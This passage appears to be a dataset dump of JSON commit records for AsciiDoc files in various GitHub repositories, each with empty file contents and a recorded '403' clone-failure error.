'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d6ab0f7730a8a660157f75eb9010887c5d7b28ca","subject":"y2b create post 3 Cool Tech Deals - #3","message":"y2b create post 3 Cool Tech Deals - #3","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-06-24-3-Cool-Tech-Deals--3.adoc","new_file":"_posts\/2015-06-24-3-Cool-Tech-Deals--3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0dba8908f611c1844a2c3238d0e9e1bbd7ff635","subject":"Update 2016-10-14-A-escolha-de-um-blog.adoc","message":"Update 2016-10-14-A-escolha-de-um-blog.adoc","repos":"diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io","old_file":"_posts\/2016-10-14-A-escolha-de-um-blog.adoc","new_file":"_posts\/2016-10-14-A-escolha-de-um-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diogoan\/diogoan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ba2c80fb913eb2d71b4607e8035dcf4a8b868ca","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46044e1e7edb64f06632573a878298fc59ea878d","subject":"Improve documentation format with other small fixes.","message":"Improve documentation format with other small fixes.\n","repos":"tcsavage\/cats,funcool\/cats","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcsavage\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"bb78686b47cabc95e964268ba014cbf5cc3ae177","subject":"Update 2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","message":"Update 2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","new_file":"_posts\/2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2df1f81b80cc18c206083e4d7ea1fbf8e71f64a5","subject":"checked out in windows","message":"checked out in windows\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/milestones\/milestone_3\/plugins_involucrados\/Agregado de Usuarios | Wallet Contacts | Actor Intra User | Intra User Network Service.asciidoc","new_file":"fermat-documentation\/milestones\/milestone_3\/plugins_involucrados\/Agregado de Usuarios | Wallet Contacts | Actor Intra User | Intra User Network Service.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10a00f468b4defa30185b72857d6f42a5240fefa","subject":"Update 2016-02-18-XML-Prague-2016-Review.adoc","message":"Update 2016-02-18-XML-Prague-2016-Review.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-XML-Prague-2016-Review.adoc","new_file":"_posts\/2016-02-18-XML-Prague-2016-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b97e06380339d6ae7223d9eab4ed569bd376ee43","subject":"testing docs","message":"testing docs\n","repos":"untangled-web\/untangled-client","old_file":"docs\/sample.adoc","new_file":"docs\/sample.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/untangled-web\/untangled-client.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06afa8f04a8df5563935344a8127ff6a2cd60f8c","subject":"docs: workflow for backing up or restoring an entire node","message":"docs: workflow for backing up or restoring an entire node\n\nI explicitly chose to be vague and not provide example shell commands\nbecause this is such a niche workflow.\n\nChange-Id: I638f4b169282d6688dec414eabfe4c81d0a3f5df\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/10223\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Kudu Jenkins\n","repos":"InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd5f42564392288321a98befd08f4d61332289e6","subject":"Update 2016-10-21-opensource-paas.adoc","message":"Update 2016-10-21-opensource-paas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-21-opensource-paas.adoc","new_file":"_posts\/2016-10-21-opensource-paas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bb83538bb53e7a97557fac710c134818caf6cf7","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3150fed9cd3b92d83f557146dcb2c30c949b55b4","subject":"Update 2016-04-15-Introduccion-a-Ruby.adoc","message":"Update 2016-04-15-Introduccion-a-Ruby.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51f5a547090d5c05c79b90ba9cd44475492086f3","subject":"Update 2016-04-14-Inyeccion-L-D-A-P.adoc","message":"Update 2016-04-14-Inyeccion-L-D-A-P.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Inyeccion-L-D-A-P.adoc","new_file":"_posts\/2016-04-14-Inyeccion-L-D-A-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a05ff64770c98b6fb75638c07af9723a9d3ad783","subject":"Update 2016-07-29-kanban.adoc","message":"Update 2016-07-29-kanban.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-29-kanban.adoc","new_file":"_posts\/2016-07-29-kanban.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5041d0c6b17a5d5878f2ac093a00906cd08cda10","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddd9fe19e9337461c3d3e62845b9c0599b4e32cf","subject":"Start of a document to record useful debugging incantations","message":"Start of a document to record useful debugging incantations\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/sota_client_cpp","old_file":"docs\/debugging-tips.adoc","new_file":"docs\/debugging-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"04e49c177e3adfa697d20a220405e9cc95e7b566","subject":"Adds the EXISTS CIP","message":"Adds the EXISTS CIP\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2015-05-13-EXISTS.adoc","new_file":"cip\/1.accepted\/CIP2015-05-13-EXISTS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6abd2f9dc0a0922d5039776c4bcaa915d0ad2add","subject":"Added document with single node software versions","message":"Added document with single node software versions\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/single_node_sw.adoc","new_file":"docs\/single_node_sw.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e468208e89a3b4b59cb2d6d3f2e4569556feb5cb","subject":"Update 2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","message":"Update 2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","new_file":"_posts\/2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec40fd62c893a9d1e7ab60bfcccefb2191f4a893","subject":"Create fr\/le_langage.adoc","message":"Create fr\/le_langage.adoc","repos":"reyman\/mageo-documentation,reyman\/mageo-documentation,reyman\/mageo-documentation","old_file":"fr\/le_langage.adoc","new_file":"fr\/le_langage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reyman\/mageo-documentation.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"960276a07f5ef743852a36ed196dfc11412930ab","subject":"Update 2018-11-13-Nuxtjs.adoc","message":"Update 2018-11-13-Nuxtjs.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-13-Nuxtjs.adoc","new_file":"_posts\/2018-11-13-Nuxtjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c81d0aa395b1785f7743f6ae4f28cd6199652171","subject":"Update 2016-11-13-Graphs.adoc","message":"Update 2016-11-13-Graphs.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-11-13-Graphs.adoc","new_file":"_posts\/2016-11-13-Graphs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc292ddc81b28e0e80e1115b16f28057efeaae71","subject":"Update 2017-07-05-Curves.adoc","message":"Update 2017-07-05-Curves.adoc","repos":"TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io","old_file":"_posts\/2017-07-05-Curves.adoc","new_file":"_posts\/2017-07-05-Curves.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TsungmingLiu\/tsungmingliu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b4cfe71922fbe99aaf4ae2aaa0b9928444d864b","subject":"Publish 2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","message":"Publish 2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","new_file":"2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7608544def4610aae9d9658a6d6cfdb4d904071c","subject":"Update 2013-05-07-Globally-parsing-JSON-error-responses-with-jQueryajax.adoc","message":"Update 2013-05-07-Globally-parsing-JSON-error-responses-with-jQueryajax.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-05-07-Globally-parsing-JSON-error-responses-with-jQueryajax.adoc","new_file":"_posts\/2013-05-07-Globally-parsing-JSON-error-responses-with-jQueryajax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff6dfdf23caee19940934c2c2d3cb789e651ce03","subject":"Update 2016-11-06-Sunday.adoc","message":"Update 2016-11-06-Sunday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-06-Sunday.adoc","new_file":"_posts\/2016-11-06-Sunday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8de013e89240d49157d61d483872ad5fdbcf7937","subject":"Update 2017-01-10-Resume.adoc","message":"Update 2017-01-10-Resume.adoc","repos":"trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io","old_file":"_posts\/2017-01-10-Resume.adoc","new_file":"_posts\/2017-01-10-Resume.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trycrmr\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"600436d3266dcfab56eb2aebf2643a0a638d11b4","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7037542286a524f35861f116593a68addfa9cca6","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab3363ba9ecd228bcdd62e3d663f416eb71a370d","subject":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T2.adoc","message":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T2.adoc","new_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"209fb3f734e5e0abe291635b5fb20377dc9d5c53","subject":"Update 2018-02-26-newton-method.adoc","message":"Update 2018-02-26-newton-method.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-26-newton-method.adoc","new_file":"_posts\/2018-02-26-newton-method.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2106b7e1ae629bc5b1370b5f72ee1e3346b1235c","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-mock","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-mock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"623ca6b1fbb128343187276a87470d80e17a081e","subject":"Add contributing document","message":"Add contributing document\n","repos":"spring-projects\/spring-social-twitter,spring-projects\/spring-social-twitter,hudsonmendes\/spring-social-twitter,hudsonmendes\/spring-social-twitter","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-social-twitter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"30c24e4c83db122281466318877f6e736fac60a9","subject":"Add a CONTRIBUTING page to the repository","message":"Add a CONTRIBUTING page to the repository\n\nThis enables a link to appear in the GitHub UI when creating an issue\nor a pull request linking to this content.\n","repos":"jhouserizer\/ehcache3,rkavanap\/ehcache3,GaryWKeim\/ehcache3,rkavanap\/ehcache3,albinsuresh\/ehcache3,rishabhmonga\/ehcache3,ljacomet\/ehcache3,AbfrmBlr\/ehcache3,cljohnso\/ehcache3,chrisdennis\/ehcache3,GaryWKeim\/ehcache3,cschanck\/ehcache3,chrisdennis\/ehcache3,lorban\/ehcache3,ljacomet\/ehcache3,aurbroszniowski\/ehcache3,akomakom\/ehcache3,AbfrmBlr\/ehcache3,ehcache\/ehcache3,ehcache\/ehcache3,cschanck\/ehcache3,henri-tremblay\/ehcache3,kedar031\/ehcache3,alexsnaps\/ehcache3,lorban\/ehcache3,jhouserizer\/ehcache3,cljohnso\/ehcache3,aurbroszniowski\/ehcache3,anthonydahanne\/ehcache3,albinsuresh\/ehcache3","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhouserizer\/ehcache3.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b4eb23ba3475d05b57726c2a43aafc40d05da6fe","subject":"Add CONTRIBUTING doc","message":"Add CONTRIBUTING doc\n","repos":"loosebazooka\/simple-spring-boot-appengine-app","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/loosebazooka\/simple-spring-boot-appengine-app.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a8557a2cf7feab046889dc17c3604ac41fe2991","subject":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","message":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc113e7133d6fa76290b7ee4b52434a57893147a","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-security,spring-cloud\/spring-cloud-security,spring-cloud\/spring-cloud-security","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"056e94b2f4c45bdf47c550e812182705efa85d2d","subject":"Update 2016-02-02-.adoc","message":"Update 2016-02-02-.adoc","repos":"blackgun\/blackgun.github.io,blackgun\/blackgun.github.io,blackgun\/blackgun.github.io","old_file":"_posts\/2016-02-02-.adoc","new_file":"_posts\/2016-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blackgun\/blackgun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d06be0707caaf974b9efdadd68196859bc3bfff0","subject":"Added link to test framework for plugin authors","message":"Added link to test framework for plugin authors\n","repos":"pablocastro\/elasticsearch,nellicus\/elasticsearch,MichaelLiZhou\/elasticsearch,franklanganke\/elasticsearch,mapr\/elasticsearch,rhoml\/elasticsearch,fernandozhu\/elasticsearch,mm0\/elasticsearch,MjAbuz\/elasticsearch,xuzha\/elasticsearch,elasticdog\/elasticsearch,C-Bish\/elasticsearch,achow\/elasticsearch,MichaelLiZhou\/elasticsearch,tkssharma\/elasticsearch,jchampion\/elasticsearch,jpountz\/elasticsearch,nrkkalyan\/elasticsearch,mgalushka\/elasticsearch,henakamaMSFT\/elasticsearch,queirozfcom\/elasticsearch,markharwood\/elasticsearch,schonfeld\/elasticsearch,cwurm\/elasticsearch,gingerwizard\/elasticsearch,andrestc\/elasticsearch,wbowling\/elasticsearch,vroyer\/elasticassandra,myelin\/elasticsearch,yanjunh\/elasticsearch,jango2015\/elasticsearch,markharwood\/elasticsearch,mnylen\/elasticsearch,hafkensite\/elasticsearch,glefloch\/elasticsearch,GlenRSmith\/elasticsearch,caengcjd\/elasticsearch,jimczi\/elasticsearch,lzo\/elasticsearch-1,yongminxia\/elasticsearch,camilojd\/elasticsearch,MetSystem\/elasticsearch,JervyShi\/elasticsearch,springning\/elasticsearch,polyfractal\/elasticsearch,jpountz\/elasticsearch,alexshadow007\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,rento19962\/elasticsearch,abibell\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,robin13\/elasticsearch,YosuaMichael\/elasticsearch,apepper\/elasticsearch,fred84\/elasticsearch,lydonchandra\/elasticsearch,jpountz\/elasticsearch,mikemccand\/elasticsearch,gmarz\/elasticsearch,henakamaMSFT\/elasticsearch,C-Bish\/elasticsearch,MetSystem\/elasticsearch,strapdata\/elassandra-test,robin13\/elasticsearch,yongminxia\/elasticsearch,kunallimaye\/elasticsearch,MjAbuz\/elasticsearch,LewayneNaidoo\/elasticsearch,avikurapati\/elasticsearch,Uiho\/elasticsearch,mmaracic\/elasticsearch,ulkas\/elasticsearch,pritishppai\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,andrestc\/elasticsearch,zhiqinghuang\/elasticsearch,kingaj\/elasticsearch,GlenRSmith\/elasticsearch,dpursehouse\/elasticsearch,nknize\/elasticsearch,ImpressTV\/elasticsearch,HonzaKral\/elasticsearch,ImpressTV\/elasticsearch,strapdata\/elassandra-test,Rygbee\/elasticsearch,zhiqinghuang\/elasticsearch,mikemccand\/elasticsearch,vietlq\/elasticsearch,hafkensite\/elasticsearch,shreejay\/elasticsearch,sreeramjayan\/elasticsearch,camilojd\/elasticsearch,masterweb121\/elasticsearch,wimvds\/elasticsearch,sdauletau\/elasticsearch,mjason3\/elasticsearch,btiernay\/elasticsearch,rajanm\/elasticsearch,wittyameta\/elasticsearch,tahaemin\/elasticsearch,drewr\/elasticsearch,nrkkalyan\/elasticsearch,brandonkearby\/elasticsearch,MaineC\/elasticsearch,Brijeshrpatel9\/elasticsearch,cnfire\/elasticsearch-1,umeshdangat\/elasticsearch,cwurm\/elasticsearch,mgalushka\/elasticsearch,liweinan0423\/elasticsearch,caengcjd\/elasticsearch,vingupta3\/elasticsearch,trangvh\/elasticsearch,kaneshin\/elasticsearch,LeoYao\/elasticsearch,socialrank\/elasticsearch,nrkkalyan\/elasticsearch,snikch\/elasticsearch,ulkas\/elasticsearch,queirozfcom\/elasticsearch,franklanganke\/elasticsearch,mmaracic\/elasticsearch,JervyShi\/elasticsearch,yongminxia\/elasticsearch,uschindler\/elasticsearch,pablocastro\/elasticsearch,Rygbee\/elasticsearch,MjAbuz\/elasticsearch,lzo\/elasticsearch-1,Ansh90\/elasticsearch,fred84\/elasticsearch,spi